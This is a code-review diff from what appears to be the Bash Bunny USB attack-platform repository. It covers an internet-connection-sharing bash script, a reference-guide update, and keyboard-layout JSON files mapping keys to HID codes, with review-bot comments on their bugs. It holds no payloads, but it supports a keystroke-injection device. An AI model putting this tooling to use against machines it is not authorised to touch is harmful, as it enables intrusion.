||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
function savechanges {
|
||||
# using ";" as a delmiter in sed is a-okay
|
||||
sed -i "s;^sbunnynmask.*;sbunnynmask=$sbunnynmask;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnynet.*;sbunnynet=$sbunnynet;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnylan.*;sbunnylan=$sbunnylan;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnywan.*;sbunnywan=$sbunnywan;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnygw.*;sbunnygw=$sbunnygw;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnyhostip.*;sbunnyhostip=$sbunnyhostip;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnyip.*;sbunnyip=$sbunnyip;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sfirsttime.*;sfirsttime=0;" "$BBSH_CONFIG"
|
||||
sfirsttime=0
|
||||
printf "\n Settings saved.\n"
|
||||
showsettings
|
||||
menu
|
||||
}
|
||||
|
||||
function connectsaved {
|
||||
if [[ "$sfirsttime" == "1" ]]; then
|
||||
printf "\n Error: Settings unsaved. Run either Guided or Manual setup first.\n"; menu
|
||||
fi
|
||||
ifconfig $sbunnylan $sbunnyhostip netmask $sbunnynmask up #Bring up Ethernet Interface directly connected to Bash Bunny
|
||||
printf "Detecting Bash Bunny..."
|
||||
until ping $sbunnyip -c1 -w1 >/dev/null
|
||||
do
|
||||
printf "."
|
||||
ifconfig $sbunnylan $sbunnyhostip netmask $sbunnynmask up &>/dev/null
|
||||
sleep 1
|
||||
done
|
||||
printf "...found.\n\n"
|
||||
printf " $(tput setaf 6) _ . $(tput sgr0) $(tput setaf 7)___$(tput sgr0) $(tput setaf 3)(\___/)$(tput sgr0)\n"
|
||||
printf " $(tput setaf 6) ( _ )_ $(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 7)[___]$(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 3)(='.'=)$(tput sgr0)\n"
|
||||
printf " $(tput setaf 6) (_ _(_ ,)$(tput sgr0) $(tput setaf 7)\___\\$(tput sgr0) $(tput setaf 3)(\")_(\")$(tput sgr0)\n"
|
||||
ifconfig $sbunnylan $sbunnyhostip netmask $sbunnynmask up #Bring up Ethernet Interface directly connected to Pineapple
|
||||
echo '1' > /proc/sys/net/ipv4/ip_forward # Enable IP Forwarding
|
||||
iptables -I FORWARD -i $sbunnywan -o $sbunnylan -s $sbunnynet -m state --state NEW -j ACCEPT #setup IP forwarding
|
||||
iptables -I FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
|
||||
iptables -I POSTROUTING -t nat -s $sbunnyip -j MASQUERADE
|
||||
route del default #remove default route
|
||||
route add default gw $sbunnygw $sbunnywan #add default gateway
|
||||
printf "\n\n"
|
||||
exit
|
||||
}
|
||||
|
||||
function start_clean {
|
||||
# undo all iptables Bashbunny related rules
|
||||
iptables -D FORWARD -i $sbunnywan -o $sbunnylan -s $sbunnynet -m state --state NEW -j ACCEPT 2>/dev/null
|
||||
iptables -D FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT 2>/dev/null
|
||||
iptables -D POSTROUTING -t nat -s $sbunnyip -j MASQUERADE 2>/dev/null
|
||||
echo '0' > /proc/sys/net/ipv4/ip_forward # Disable forwarding
|
||||
}
|
||||
|
||||
function create_bbsh_config {
|
||||
echo "sbunnynmask=255.255.255.0" > "$BBSH_CONFIG"
|
||||
echo "sbunnynet=172.16.64.0/24" >> "$BBSH_CONFIG"
|
||||
echo "sbunnylan=enx001122334455" >> "$BBSH_CONFIG"
|
||||
echo "sbunnywan=wlo1" >> "$BBSH_CONFIG"
|
||||
echo "sbunnygw=192.168.1.1" >> "$BBSH_CONFIG"
|
||||
echo "sbunnyhostip=172.16.64.64" >> "$BBSH_CONFIG"
|
||||
echo "sbunnyip=172.16.64.1" >> "$BBSH_CONFIG"
|
||||
echo "sfirsttime=1" >> "$BBSH_CONFIG"
|
||||
}
|
||||
|
||||
function bunny {
|
||||
printf "\nNetmask $sbunnynmask\nBunny Net $sbunnynet\nBunny LAN $sbunnylan\nBunny WAN $sbunnywan\nBunny GW $sbunnygw\nBunny IP $sbunnyip\nHost IP $sbunnyhostip\n"
|
||||
printf "\n/)___(\ \n(='.'=)\n(\")_(\")\n"
|
||||
exit
|
||||
}
|
||||
|
||||
banner #remove for less 1337
|
||||
showsettings
|
||||
|
||||
# create bbsh_config if it doesn't exist
|
||||
[ -f "$BBSH_CONFIG" ] || create_bbsh_config
|
||||
source "$BBSH_CONFIG"
|
||||
|
||||
if [[ "$sfirsttime" == "1" ]]; then
|
||||
printf "
|
||||
Since this is the first time running the BB Internet Connection Sharing\n\
|
||||
script, Guided setup is recommended to save initial configuration.\n\
|
||||
Subsequent sessions may be quickly connected using saved settings.\n"
|
||||
fi
|
||||
|
||||
# Removes iptables rules if the script gets a Ctrl-C
|
||||
trap start_clean INT
|
||||
|
||||
menu
|
|
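Review bot: in `connectsaved` the unsaved-settings check (`if [[ "$sfirsttime" == "1" ]]`) prints the error and calls `menu` but never returns, so if `menu` comes back the function carries on into `ifconfig`/`iptables`/`route` with the placeholder values written by `create_bbsh_config`; add `return` (or `exit 1`) after `menu`. Two smaller points in the same region: the comment on the second `ifconfig` in `connectsaved` says "directly connected to Pineapple" (copy-paste leftover; it should say Bash Bunny), and `start_clean`, which is also the INT trap, runs `iptables -D FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT` with no interface match, so a Ctrl-C before the rules were inserted deletes a pre-existing identical host rule instead of the script's own; tagging the script's rules (`-m comment --comment bbsh`) or restricting them by interface keeps cleanup to what the script added. `start_clean` also never restores the default route that `route del default` / `route add default gw` replaced, so after Ctrl-C the host is left without its original gateway.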
@ -6,7 +6,7 @@
|
|||
Bash Bunny by Hak5 USB Attack/Automation Platform
|
||||
|
||||
|
||||
-+- QUICK REFERENCE GUIDE v1.4 -+-
|
||||
-+- QUICK REFERENCE GUIDE v1.5 -+-
|
||||
|
||||
|
||||
+-----------------+
|
||||
|
@ -107,6 +107,8 @@
|
|||
$HOST_IP IP Address of the Bash Bunny
|
||||
(Default: 172.16.64.1)
|
||||
$SWITCH_POSITION "switch1", "switch2" or "switch3"
|
||||
$BB_LABEL Volume name of the BashBunny
|
||||
when mounted.
|
||||
|
||||
|
||||
|
||||
|
@ -153,6 +155,8 @@
|
|||
GET TARGET_HOSTNAME Returns $TARGET_HOSTNAME
|
||||
GET HOST_IP Returns $HOST_IP
|
||||
GET SWITCH_POSITION Returns $SWITCH_POSITION
|
||||
GET TARGET_OS Returns $TARGET_OS
|
||||
GET BB_LABEL Returns $BB_LABEL
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -165,5 +165,104 @@
|
|||
"\\":"40,00,64",
|
||||
"COMMAND-CTRL-SHIFT":"40,00,64",
|
||||
"COMMAND-CTRL":"40,00,64",
|
||||
"COMMAND-OPTION-SHIFT'":"40,00,64"
|
||||
}
|
||||
"COMMAND-OPTION-SHIFT'":"40,00,64",
|
||||
"__comment":"Everything below was additionally added by kuyaya",
|
||||
"GUI-l":"08,00,0f",
|
||||
"RIGHTSHIFT":"20,00,00",
|
||||
"A":"20,00,04",
|
||||
"B":"20,00,05",
|
||||
"C":"20,00,06",
|
||||
"D":"20,00,07",
|
||||
"E":"20,00,08",
|
||||
"F":"20,00,09",
|
||||
"G":"20,00,0a",
|
||||
"H":"20,00,0b",
|
||||
"I":"20,00,0c",
|
||||
"J":"20,00,0d",
|
||||
"K":"20,00,0e",
|
||||
"L":"20,00,0f",
|
||||
"M":"20,00,10",
|
||||
"N":"20,00,11",
|
||||
"O":"20,00,12",
|
||||
"P":"20,00,13",
|
||||
"Q":"20,00,14",
|
||||
"R":"20,00,15",
|
||||
"S":"20,00,16",
|
||||
"T":"20,00,17",
|
||||
"U":"20,00,18",
|
||||
"V":"20,00,19",
|
||||
"W":"20,00,1a",
|
||||
"X":"20,00,1b",
|
||||
"Z":"20,00,1c",
|
||||
"Y":"20,00,1d",
|
||||
"+":"20,00,1e",
|
||||
"\"":"20,00,1f",
|
||||
"*":"20,00,20",
|
||||
"%":"20,00,22",
|
||||
"&":"20,00,23",
|
||||
"/":"20,00,24",
|
||||
"(":"20,00,25",
|
||||
")":"20,00,26",
|
||||
"=":"20,00,27",
|
||||
"?":"20,00,2d",
|
||||
"`":"20,00,2e",
|
||||
"!":"20,00,30",
|
||||
";":"20,00,36",
|
||||
":":"20,00,37",
|
||||
"_":"20,00,38",
|
||||
">":"20,00,64",
|
||||
"°":"02,00,35",
|
||||
"°":"20,00,35",
|
||||
"§":"00,00,35",
|
||||
"ç":"02,00,21",
|
||||
"ç":"20,00,21",
|
||||
"¬":"40,00,23",
|
||||
"¦":"40,00,1e",
|
||||
"¢":"40,00,25",
|
||||
"´":"40,00,2d",
|
||||
"BACKSPACE":"00,00,2a",
|
||||
"SHIFT-BACKSPACE":"02,00,2a",
|
||||
"SHIFT-BACKSPACE":"20,00,2a",
|
||||
"€":"40,00,08",
|
||||
"è":"02,00,2f",
|
||||
"è":"20,00,2f",
|
||||
"ü":"00,00,2f",
|
||||
"¨":"00,00,30",
|
||||
"é":"02,00,33",
|
||||
"é":"20,00,33",
|
||||
"ö":"00,00,33",
|
||||
"ä":"00,00,34",
|
||||
"à":"02,00,34",
|
||||
"à":"20,00,34",
|
||||
"£":"02,00,32",
|
||||
"£":"20,00,32",
|
||||
"ALT-GR":"40,00,00",
|
||||
"RIGHTCONTROL":"10,00,00",
|
||||
"NUMLOCK":"00,00,53",
|
||||
"+":"00,00,57",
|
||||
"-":"00,00,56",
|
||||
"*":"00,00,55",
|
||||
"/":"00,00,54",
|
||||
"ENTER":"00,00,58",
|
||||
"DEL":"00,00,63",
|
||||
"INSERT":"00,00,62",
|
||||
"END":"00,00,59",
|
||||
"DOWN":"00,00,5a",
|
||||
"PAGEDOWN":"00,00,5b",
|
||||
"LEFT":"00,00,5c",
|
||||
"RIGHT":"00,00,5e",
|
||||
"HOME":"00,00,5f",
|
||||
"UP":"00,00,60",
|
||||
"PAGEUP":"00,00,61",
|
||||
".":"00,00,63",
|
||||
"0":"00,00,62",
|
||||
"1":"00,00,59",
|
||||
"2":"00,00,5a",
|
||||
"3":"00,00,5b",
|
||||
"4":"00,00,5c",
|
||||
"5":"00,00,5d",
|
||||
"6":"00,00,5e",
|
||||
"7":"00,00,5f",
|
||||
"8":"00,00,60",
|
||||
"9":"00,00,61"
|
||||
}
|
||||
|
|
|
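Review bot: this block introduces duplicate JSON keys, and with duplicate keys the loader's behaviour depends on the parser (most keep the last value), so the later entry silently shadows the earlier one. Visible in the hunk: `"+"` (`20,00,1e` at L1967 and `00,00,57` at L2099), `"*"` (L1973 / L2105), `"/"` (L1982 / L2108), and the `02`/`20` modifier pairs for `"°"`, `"ç"`, `"è"`, `"é"`, `"à"`, `"£"` and `"SHIFT-BACKSPACE"`, where the second copy (RightShift) makes the first (LeftShift) dead. The keypad entries at L2099–L2174 (`"0"`…`"9"`, `"."`, `"-"`, `"ENTER"`, `"DEL"`, `"INSERT"`, `"END"`, `"HOME"`, `"UP"`/`"DOWN"`/`"LEFT"`/`"RIGHT"`, `"PAGEUP"`/`"PAGEDOWN"`) reuse the names of main-keyboard keys (presumably defined earlier in this file, as in every other layout), so digits become keypad digits (which type nothing when NumLock is off, the default on most laptops) and the arrow names become keypad 2/4/6/8. Name them `KPAD_0`…`KPAD_9`, `KPAD_DOT`, `KPAD_ENTER`, `KPAD_PLUS` etc., as the gb layout in this same commit does, and drop one copy of each `02`/`20` pair (LeftShift `02` is what the rest of the layouts use). Also `"ALT-GR"` here versus `"ALTGR"` in the gb layout: pick one spelling so payloads are portable across layouts.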
@ -144,7 +144,7 @@
|
|||
"/":"02,00,24",
|
||||
"(":"02,00,25",
|
||||
")":"02,00,26",
|
||||
")":"02,00,27",
|
||||
"=":"02,00,27",
|
||||
"?":"02,00,2d",
|
||||
"¡":"02,00,2e",
|
||||
"¨":"02,00,2f",
|
||||
|
|
|
@ -56,6 +56,7 @@
|
|||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"BACKSPACE":"00,00,2a",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
|
@ -64,6 +65,7 @@
|
|||
"[":"00,00,2f",
|
||||
"]":"00,00,30",
|
||||
"#":"00,00,31",
|
||||
"__comment":"MIA K42 00,00,32",
|
||||
";":"00,00,33",
|
||||
"'":"00,00,34",
|
||||
"`":"00,00,35",
|
||||
|
@ -102,10 +104,26 @@
|
|||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"NUMLOCK":"00,00,53",
|
||||
"KPAD_SLASH":"00,00,54",
|
||||
"KPAD_ASTERISK":"00,00,55",
|
||||
"KPAD_MINUS":"00,00,56",
|
||||
"KPAD_PLUS":"00,00,57",
|
||||
"KPAD_ENTER":"00,00,58",
|
||||
"KPAD_1":"00,00,59",
|
||||
"KPAD_2":"00,00,5a",
|
||||
"KPAD_3":"00,00,5b",
|
||||
"KPAD_4":"00,00,5c",
|
||||
"KPAD_5":"00,00,5d",
|
||||
"KPAD_6":"00,00,5e",
|
||||
"KPAD_7":"00,00,5f",
|
||||
"KPAD_8":"00,00,60",
|
||||
"KPAD_9":"00,00,61",
|
||||
"KPAD_0":"00,00,62",
|
||||
"KPAD_DOT":"00,00,63",
|
||||
"\\":"00,00,64",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
|
@ -137,6 +155,7 @@
|
|||
"Z":"02,00,1d",
|
||||
"!":"02,00,1e",
|
||||
"\"":"02,00,1f",
|
||||
"£":"02,00,20",
|
||||
"$":"02,00,21",
|
||||
"%":"02,00,22",
|
||||
"^":"02,00,23",
|
||||
|
@ -151,19 +170,26 @@
|
|||
"~":"02,00,31",
|
||||
":":"02,00,33",
|
||||
"@":"02,00,34",
|
||||
"¬":"02,00,35",
|
||||
"<":"02,00,36",
|
||||
">":"02,00,37",
|
||||
"?":"02,00,38",
|
||||
"|":"02,00,64",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"ALT-TAB":"04,00,2b",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"12,00,00",
|
||||
"COMMAND-CTRL":"12,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"12,00,00"
|
||||
"COMMAND":"08,00,00",
|
||||
"COMMAND-CTRL":"09,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"0b,00,00",
|
||||
"COMMAND-OPTION":"0c,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"0e,00,00",
|
||||
"ALTGR":"40,00,00",
|
||||
"ALTGR-TAB":"40,00,2b",
|
||||
"¦":"40,00,35",
|
||||
"CTRL-ALTGR":"41,00,00",
|
||||
"ALTGR-SHIFT":"42,00,00"
|
||||
}
|
|
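Review bot: `"COMMAND-OPTION-SHIFT'":"0e,00,00"` keeps the stray apostrophe inside the key name even though this hunk corrects the modifier bytes (`12,00,00` → `09`/`0b`/`0c`/`0e`); the new layouts in this commit (L3138, L3721) use `COMMAND-OPTION-SHIFT` without it, so a payload written against the documented name will not match in this file. The added `"ALT-TAB":"04,00,2b"` also duplicates the existing `"ALT-TAB":"00,00,71"` at L2335 (usage 0x71 is F22, not Alt+Tab); since duplicate JSON keys resolve by parser order rather than intent, delete the `00,00,71` entry instead of relying on the new one winning.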
@ -0,0 +1,187 @@
|
|||
{
|
||||
"__comment":"All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment":" ",
|
||||
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment":" of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment":" ",
|
||||
"__comment":"Definition of these 3 bytes can be found",
|
||||
"__comment":" in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment":" of document Device Class Definition for HID Version 1.11",
|
||||
"__comment":" - byte 1: Modifier keys",
|
||||
"__comment":" - byte 2: Reserved",
|
||||
"__comment":" - byte 3: Keycode 1",
|
||||
"__comment":" ",
|
||||
"__comment":"Both documents can be obtained from link here",
|
||||
"__comment":" http://www.usb.org/developers/hidpage/",
|
||||
"__comment":" ",
|
||||
"__comment":" Hungarian QWERTZ language made by Skeleton022",
|
||||
"__comment":" Added áéíóöőúüűÁÉÍÓÖŐÚÜŰ",
|
||||
"a":"00,00,04",
|
||||
"b":"00,00,05",
|
||||
"c":"00,00,06",
|
||||
"d":"00,00,07",
|
||||
"e":"00,00,08",
|
||||
"f":"00,00,09",
|
||||
"g":"00,00,0a",
|
||||
"h":"00,00,0b",
|
||||
"i":"00,00,0c",
|
||||
"j":"00,00,0d",
|
||||
"k":"00,00,0e",
|
||||
"l":"00,00,0f",
|
||||
"m":"00,00,10",
|
||||
"n":"00,00,11",
|
||||
"o":"00,00,12",
|
||||
"p":"00,00,13",
|
||||
"q":"00,00,14",
|
||||
"r":"00,00,15",
|
||||
"s":"00,00,16",
|
||||
"t":"00,00,17",
|
||||
"u":"00,00,18",
|
||||
"v":"00,00,19",
|
||||
"w":"00,00,1a",
|
||||
"x":"00,00,1b",
|
||||
"z":"00,00,1c",
|
||||
"y":"00,00,1d",
|
||||
"1":"00,00,1e",
|
||||
"2":"00,00,1f",
|
||||
"3":"00,00,20",
|
||||
"4":"00,00,21",
|
||||
"5":"00,00,22",
|
||||
"6":"00,00,23",
|
||||
"7":"00,00,24",
|
||||
"8":"00,00,25",
|
||||
"9":"00,00,26",
|
||||
"ö":"00,00,27",
|
||||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
"ü":"00,00,2d",
|
||||
"ó":"00,00,2e",
|
||||
"ő":"00,00,2f",
|
||||
"ú":"00,00,30",
|
||||
"ű":"00,00,31",
|
||||
"é":"00,00,33",
|
||||
"á":"00,00,34",
|
||||
"0":"00,00,35",
|
||||
",":"00,00,36",
|
||||
".":"00,00,37",
|
||||
"-":"00,00,38",
|
||||
"CAPSLOCK":"00,00,39",
|
||||
"F1":"00,00,3a",
|
||||
"F2":"00,00,3b",
|
||||
"F3":"00,00,3c",
|
||||
"F4":"00,00,3d",
|
||||
"F5":"00,00,3e",
|
||||
"F6":"00,00,3f",
|
||||
"F7":"00,00,40",
|
||||
"F8":"00,00,41",
|
||||
"F9":"00,00,42",
|
||||
"F10":"00,00,43",
|
||||
"F11":"00,00,44",
|
||||
"F12":"00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK":"00,00,47",
|
||||
"BREAK":"00,00,48",
|
||||
"PAUSE":"00,00,48",
|
||||
"INSERT":"00,00,49",
|
||||
"HOME":"00,00,4a",
|
||||
"PAGEUP":"00,00,4b",
|
||||
"DEL":"00,00,4c",
|
||||
"DELETE":"00,00,4c",
|
||||
"END":"00,00,4d",
|
||||
"PAGEDOWN":"00,00,4e",
|
||||
"RIGHT":"00,00,4f",
|
||||
"RIGHTARROW":"00,00,4f",
|
||||
"LEFT":"00,00,50",
|
||||
"LEFTARROW":"00,00,50",
|
||||
"DOWN":"00,00,51",
|
||||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"í":"00,00,64",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
"A":"02,00,04",
|
||||
"B":"02,00,05",
|
||||
"C":"02,00,06",
|
||||
"D":"02,00,07",
|
||||
"E":"02,00,08",
|
||||
"F":"02,00,09",
|
||||
"G":"02,00,0a",
|
||||
"H":"02,00,0b",
|
||||
"I":"02,00,0c",
|
||||
"J":"02,00,0d",
|
||||
"K":"02,00,0e",
|
||||
"L":"02,00,0f",
|
||||
"M":"02,00,10",
|
||||
"N":"02,00,11",
|
||||
"O":"02,00,12",
|
||||
"P":"02,00,13",
|
||||
"Q":"02,00,14",
|
||||
"R":"02,00,15",
|
||||
"S":"02,00,16",
|
||||
"T":"02,00,17",
|
||||
"U":"02,00,18",
|
||||
"V":"02,00,19",
|
||||
"W":"02,00,1a",
|
||||
"X":"02,00,1b",
|
||||
"Z":"02,00,1c",
|
||||
"Y":"02,00,1d",
|
||||
"'":"02,00,1e",
|
||||
"\"":"02,00,1f",
|
||||
"+":"02,00,20",
|
||||
"!":"02,00,21",
|
||||
"%":"02,00,22",
|
||||
"/":"02,00,23",
|
||||
"=":"02,00,24",
|
||||
"(":"02,00,25",
|
||||
")":"02,00,26",
|
||||
"Ö":"02,00,27",
|
||||
"Ü":"02,00,2d",
|
||||
"Ó":"02,00,2e",
|
||||
"Ő":"02,00,2f",
|
||||
"Ú":"02,00,30",
|
||||
"Ű":"02,00,31",
|
||||
"É":"02,00,33",
|
||||
"Á":"02,00,34",
|
||||
"?":"02,00,36",
|
||||
":":"02,00,37",
|
||||
"_":"02,00,38",
|
||||
"Í":"02,00,64",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"12,00,00",
|
||||
"COMMAND-CTRL":"12,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"12,00,00",
|
||||
"{":"40,00,05",
|
||||
"&":"40,00,06",
|
||||
"[":"40,00,09",
|
||||
"]":"40,00,0a",
|
||||
"}":"40,00,11",
|
||||
"\\":"40,00,14",
|
||||
"@":"40,00,19",
|
||||
"|":"40,00,1a",
|
||||
"#":"40,00,1b",
|
||||
">":"40,00,1d",
|
||||
"~":"40,00,1e",
|
||||
"^":"40,00,20",
|
||||
"`":"40,00,24",
|
||||
"$":"40,00,33",
|
||||
";":"40,00,36",
|
||||
"*":"40,00,38",
|
||||
"<":"40,00,64"
|
||||
}
|
|
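Review bot: `BACKSPACE` (`00,00,2a`) is missing from this layout (ENTER, ESC/ESCAPE, TAB, DEL/DELETE are all present), so `Q BACKSPACE` silently types nothing; add `"BACKSPACE":"00,00,2a"` after `"ESCAPE"`. The Mac combinations copy the `12,00,00` value (0x12 is LeftShift|RightCtrl, 0x02|0x10, not GUI) that the gb hunk in this same commit corrects to `09`/`0b`/`0c`/`0e` for `COMMAND-CTRL`, `COMMAND-CTRL-SHIFT`, `COMMAND-OPTION` and `COMMAND-OPTION-SHIFT`; use the corrected values here too and drop the stray `'` in `"COMMAND-OPTION-SHIFT'"`.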
@ -0,0 +1,172 @@
|
|||
{
|
||||
"__comment": "All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment": " ",
|
||||
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment": " of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment": " ",
|
||||
"__comment": "Definition of these 3 bytes can be found",
|
||||
"__comment": " in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment": " of document Device Class Definition for HID Version 1.11",
|
||||
"__comment": " - byte 1: Modifier keys",
|
||||
"__comment": " - byte 2: Reserved",
|
||||
"__comment": " - byte 3: Keycode 1",
|
||||
"__comment": " ",
|
||||
"__comment": "Both documents can be obtained from link here",
|
||||
"__comment": " http://www.usb.org/developers/hidpage/",
|
||||
"__comment": " ",
|
||||
"__comment": "A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment": " ",
|
||||
"CTRL": "01,00,00",
|
||||
"CONTROL": "01,00,00",
|
||||
"SHIFT": "02,00,00",
|
||||
"ALT": "04,00,00",
|
||||
"GUI": "08,00,00",
|
||||
"WINDOWS": "08,00,00",
|
||||
"CTRL-ALT": "05,00,00",
|
||||
"CTRL-SHIFT": "03,00,00",
|
||||
"ALT-SHIFT": "06,00,00",
|
||||
"__comment": "Below 5 key combinations are for Mac OSX",
|
||||
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
|
||||
"COMMAND": "08,00,00",
|
||||
"COMMAND-CTRL": "09,00,00",
|
||||
"COMMAND-CTRL-SHIFT": "0B,00,00",
|
||||
"COMMAND-OPTION": "0C,00,00",
|
||||
"COMMAND-OPTION-SHIFT": "0E,00,00",
|
||||
"a": "00,00,04",
|
||||
"A": "02,00,04",
|
||||
"b": "00,00,05",
|
||||
"B": "02,00,05",
|
||||
"c": "00,00,06",
|
||||
"C": "02,00,06",
|
||||
"d": "00,00,07",
|
||||
"D": "02,00,07",
|
||||
"e": "00,00,08",
|
||||
"E": "02,00,08",
|
||||
"f": "00,00,09",
|
||||
"F": "02,00,09",
|
||||
"g": "00,00,0a",
|
||||
"G": "02,00,0a",
|
||||
"h": "00,00,0b",
|
||||
"H": "02,00,0b",
|
||||
"i": "00,00,0c",
|
||||
"I": "02,00,0c",
|
||||
"j": "00,00,0d",
|
||||
"J": "02,00,0d",
|
||||
"k": "00,00,0e",
|
||||
"K": "02,00,0e",
|
||||
"l": "00,00,0f",
|
||||
"L": "02,00,0f",
|
||||
"m": "00,00,10",
|
||||
"M": "02,00,10",
|
||||
"n": "00,00,11",
|
||||
"N": "02,00,11",
|
||||
"o": "00,00,12",
|
||||
"O": "02,00,12",
|
||||
"p": "00,00,13",
|
||||
"P": "02,00,13",
|
||||
"q": "00,00,14",
|
||||
"Q": "02,00,14",
|
||||
"r": "00,00,15",
|
||||
"R": "02,00,15",
|
||||
"s": "00,00,16",
|
||||
"S": "02,00,16",
|
||||
"t": "00,00,17",
|
||||
"T": "02,00,17",
|
||||
"u": "00,00,18",
|
||||
"U": "02,00,18",
|
||||
"v": "00,00,19",
|
||||
"V": "02,00,19",
|
||||
"w": "00,00,1a",
|
||||
"W": "02,00,1a",
|
||||
"x": "00,00,1b",
|
||||
"X": "02,00,1b",
|
||||
"y": "00,00,1c",
|
||||
"Y": "02,00,1c",
|
||||
"z": "00,00,1d",
|
||||
"Z": "02,00,1d",
|
||||
"1": "00,00,1e",
|
||||
"!": "02,00,1e",
|
||||
"2": "00,00,1f",
|
||||
"\"": "02,00,1f",
|
||||
"3": "00,00,20",
|
||||
"#": "02,00,20",
|
||||
"4": "00,00,21",
|
||||
"$": "02,00,21",
|
||||
"5": "00,00,22",
|
||||
"%": "02,00,22",
|
||||
"6": "00,00,23",
|
||||
"&": "02,00,23",
|
||||
"7": "00,00,24",
|
||||
"'": "02,00,24",
|
||||
"8": "00,00,25",
|
||||
"(": "02,00,25",
|
||||
"9": "00,00,26",
|
||||
")": "02,00,26",
|
||||
"0": "00,00,27",
|
||||
"ENTER": "00,00,28",
|
||||
"ESC": "00,00,29",
|
||||
"ESCAPE": "00,00,29",
|
||||
"BACKSPACE": "00,00,2a",
|
||||
"TAB": "00,00,2b",
|
||||
"ALT-TAB": "04,00,2b",
|
||||
"SPACE": "00,00,2c",
|
||||
" ": "00,00,2c",
|
||||
"-": "00,00,2d",
|
||||
"=": "02,00,2d",
|
||||
"^": "00,00,2e",
|
||||
"~": "02,00,2e",
|
||||
"@": "00,00,2f",
|
||||
"`": "02,00,2f",
|
||||
"[": "00,00,30",
|
||||
"{": "02,00,30",
|
||||
"\\": "00,00,31",
|
||||
"|": "02,00,31",
|
||||
"]": "00,00,32",
|
||||
"}": "02,00,32",
|
||||
";": "00,00,33",
|
||||
"+": "02,00,33",
|
||||
":": "00,00,34",
|
||||
"*": "02,00,34",
|
||||
",": "00,00,36",
|
||||
"<": "02,00,36",
|
||||
".": "00,00,37",
|
||||
">": "02,00,37",
|
||||
"/": "00,00,38",
|
||||
"?": "02,00,38",
|
||||
"CAPSLOCK": "00,00,39",
|
||||
"F1": "00,00,3a",
|
||||
"F2": "00,00,3b",
|
||||
"F3": "00,00,3c",
|
||||
"F4": "00,00,3d",
|
||||
"F5": "00,00,3e",
|
||||
"F6": "00,00,3f",
|
||||
"F7": "00,00,40",
|
||||
"F8": "00,00,41",
|
||||
"F9": "00,00,42",
|
||||
"F10": "00,00,43",
|
||||
"F11": "00,00,44",
|
||||
"F12": "00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK": "00,00,47",
|
||||
"PAUSE": "00,00,48",
|
||||
"BREAK": "00,00,48",
|
||||
"INSERT": "00,00,49",
|
||||
"HOME": "00,00,4a",
|
||||
"PAGEUP": "00,00,4b",
|
||||
"DELETE": "00,00,4c",
|
||||
"DEL": "00,00,4c",
|
||||
"END": "00,00,4d",
|
||||
"PAGEDOWN": "00,00,4e",
|
||||
"RIGHTARROW": "00,00,4f",
|
||||
"RIGHT": "00,00,4f",
|
||||
"LEFTARROW": "00,00,50",
|
||||
"LEFT": "00,00,50",
|
